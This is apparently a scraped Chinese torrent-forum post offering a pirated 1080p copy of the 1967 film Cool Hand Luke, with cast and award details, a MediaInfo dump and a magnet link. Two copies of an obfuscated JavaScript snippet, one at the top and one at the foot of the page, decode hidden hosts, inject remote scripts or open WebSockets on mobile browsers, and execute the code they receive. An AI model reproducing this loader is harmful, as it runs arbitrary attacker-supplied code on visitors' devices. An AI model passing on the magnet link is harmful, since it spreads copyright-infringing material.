铁窗喋血[中文字幕].Cool.Hand.Luke.1967.1080p.FriDay.WEB-DL.H264.AAC 3.36GB

版主小s 1月前 252

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 铁窗喋血 / 逃狱金刚 / 冷手卢克

◎片 名 Cool Hand Luke

◎年 代 1967

◎产 地 美国

◎类 别 剧情 / 犯罪

◎语 言 英语

◎上映日期 1967-11-01(美国)

◎IMDb链接 https://www.imdb.com/title/tt0061512/

◎豆瓣评分 8.1/10 (5382人评价)

◎豆瓣链接 https://movie.douban.com/subject/1293698/

◎片 长 126分钟

◎导 演 斯图尔特·罗森博格 Stuart Rosenberg (id:1147760)

◎编 剧 唐·皮尔斯 Donn Pearce (id:1294161)

弗兰克·皮尔森 Frank Pierson (id:1045411)

◎演 员 保罗·纽曼 Paul Newman (id:1054516)

乔治·肯尼迪 George Kennedy (id:1007031)

J·D·坎农 J.D. Cannon (id:1070457)

卢·安东尼奥 Lou Antonio (id:1007167)

罗伯特·德莱瓦斯 Robert Drivas (id:1086144)

斯特罗瑟·马丁 Strother Martin (id:1054839)

乔·范·弗利特 Jo Van Fleet (id:1014205)

克里夫顿·詹姆斯 Clifton James (id:1019158)

摩根·伍德沃德 Morgan Woodward (id:1161831)

卢克·艾斯丘 Luke Askew (id:1343196)

Marc Cavell Marc Cavell (id:1068985)

理查德·黛沃洛斯 Richard Davalos (id:1084247)

罗伯特·东纳 Robert Donner (id:1087073)

华伦芬纳蒂 Warren Finnerty (id:1090174)

丹尼斯·霍珀 Dennis Hopper (id:1044720)

约翰·麦克利亚姆 John McLiam (id:1007184)

韦恩·罗杰斯 Wayne Rogers (id:1000322)

哈利·戴恩·斯坦通 Harry Dean Stanton (id:1010582)

查尔斯·泰纳 Charles Tyner (id:1156354)

拉尔夫·韦特 Ralph Waite (id:1010676)

安东尼·泽比 Anthony Zerbe (id:1048203)

布克·卡特里安 Buck Kartalian (id:1107001)

乔伊·哈姆恩 Joy Harmon (id:1045231)

乔·唐·巴克 Joe Don Baker (id:1054746)

詹姆斯·盖蒙 James Gammon (id:1002781)

查克·希克斯 Chuck Hicks (id:1101151)

兰斯·霍华德 Rance Howard (id:1054335)

James Jeter James Jeter (id:1102672)

唐·皮尔斯 Donn Pearce (id:1294161)

John Pearce John Pearce (id:1137065)

Rush Williams Rush Williams (id:1162157)

拉罗·斯齐弗林 Lalo Schifrin (id:1019216)

Fred Price Fred Price (id:1294899)

汉克·穆恩简 Hank Moonjean (id:1292394)

拉里·乔斯特 Larry Jost (id:1287947)

◎标 签 美国 / 监狱 / 犯罪 / 剧情 / 1967 / 越狱 / 经典 / 人性

◎简 介

Lucas Jackson(保罗?纽曼 Paul Newman 饰),一个越战的退伍兵,在一个喝醉酒的夜里拆掉了镇上的停车计时器而被判两年的监禁。一开始,他就挑战监狱里的领袖人物Dragline(乔治?肯尼迪 George Kennedy 饰)。Dragline个头比Lucas大得多,把Lucas打得毫无还手之力,但Lucas却一直拒绝屈服,因此赢得了Dragline的尊重。而在监狱的扑克比赛中,Lucas屡屡取胜,得名Cool Hand Luke。Lucas的母亲和侄子的来访让他备受鼓舞,虽然他在监狱里要忍受许多恶劣的环境和非人的待遇,但他依旧对前途充满了希望。然而母亲的逝世却让他陷入了深深的痛苦。他比之前更想要逃狱,然而一次次的失败,和监狱长的无情,让他的路越来越难走……

本片获奥斯卡最佳男配角奖。

◎获奖情况 (共4项)

第40届奥斯卡金像奖 (1968)

最佳男主角(提名)

└──保罗·纽曼 (id:1054516)

最佳男配角

└──乔治·肯尼迪 (id:1007031)

最佳改编剧本(提名)

最佳原创配乐(提名)

└──拉罗·斯齐弗林 (id:1019216)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 237112212407223582706813599782556718777 (0xB26226A84BDACFD71192E7FDE528D6B9)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 3.36 GiB

  8. Duration : 2 h 6 min

  9. Overall bit rate : 3 808 kb/s

  10. Encoded date : UTC 2021-10-23 14:04:13

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 1 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 1 frame

  21. Format settings, GOP : M=1, N=60

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 2 h 6 min

  24. Bit rate mode : Constant

  25. Bit rate : 3 679 kb/s

  26. Nominal bit rate : 4 000 kb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 29.970 (30000/1001/53354) FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.059

  37. Stream size : 3.25 GiB (97%)

  38. Language : English

  39. Default : Yes

  40. Forced : No


  41. Audio

  42. ID : 2

  43. Format : AAC LC

  44. Format/Info : Advanced Audio Codec Low Complexity

  45. Codec ID : A_AAC-2

  46. Duration : 2 h 6 min

  47. Bit rate : 125 kb/s

  48. Channel(s) : 2 channels

  49. Channel layout : L R

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 46.875 FPS (1024 SPF)

  52. Compression mode : Lossy

  53. Stream size : 113 MiB (3%)

  54. Title : English

  55. Language : English

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 3

  60. Format : UTF-8

  61. Codec ID : S_TEXT/UTF8

  62. Codec ID/Info : UTF-8 Plain Text

  63. Duration : 2 h 4 min

  64. Bit rate : 37 b/s

  65. Count of elements : 1140

  66. Stream size : 33.9 KiB (0%)

  67. Title : Chinese Simplified

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No


  71. Text #2

  72. ID : 4

  73. Format : UTF-8

  74. Codec ID : S_TEXT/UTF8

  75. Codec ID/Info : UTF-8 Plain Text

  76. Duration : 2 h 4 min

  77. Bit rate : 37 b/s

  78. Count of elements : 1140

  79. Stream size : 33.9 KiB (0%)

  80. Title : Chinese Traditional

  81. Language : Chinese

  82. Default : No

  83. Forced : No




复制代码


TAGS 剧情 犯罪

磁力链:
  • magnet:?xt=urn:btih:FABF3316F75853AB9CB02BD20484EE6D7E2AD9D7

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};